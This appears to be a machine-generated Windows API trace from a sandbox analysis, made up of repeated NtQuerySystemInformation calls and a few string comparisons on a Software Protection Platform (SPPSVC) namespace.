[0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0264.322] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.322] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.326] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.327] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0264.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.328] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.329] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x20, ResultLength=0x0) [0264.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.330] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x20, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdcb0, Length=0x28, ResultLength=0x0) [0264.331] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.331] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdd30, Length=0x50, ResultLength=0x0) [0264.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.332] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda90, Length=0x28, ResultLength=0x0) [0264.335] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb00, Length=0x28, ResultLength=0x0) [0264.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.336] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x28, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.338] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda60, Length=0x20, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdc60, Length=0x38, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdae0, Length=0x20, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x20, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfda70, Length=0x20, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.339] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe020, Length=0x28, ResultLength=0x0) [0264.340] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.340] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.341] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x28, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x28, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x28, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.344] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x28, ResultLength=0x0) [0264.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.345] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdef0, Length=0x28, ResultLength=0x0) [0264.346] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdef0, Length=0x28, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde50, Length=0x20, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x20, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x20, ResultLength=0x0) [0264.347] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x20, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde50, Length=0x20, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.348] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe020, Length=0x28, ResultLength=0x0) [0264.349] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfe0a0, Length=0x50, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.349] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.352] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x28, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x28, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde00, Length=0x28, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde70, Length=0x28, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.353] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdef0, Length=0x28, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdef0, Length=0x28, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.355] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde50, Length=0x20, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x20, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x20, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfddd0, Length=0x20, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdfd0, Length=0x38, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfde50, Length=0x20, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0264.356] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdde0, Length=0x20, ResultLength=0x0) [0264.356] 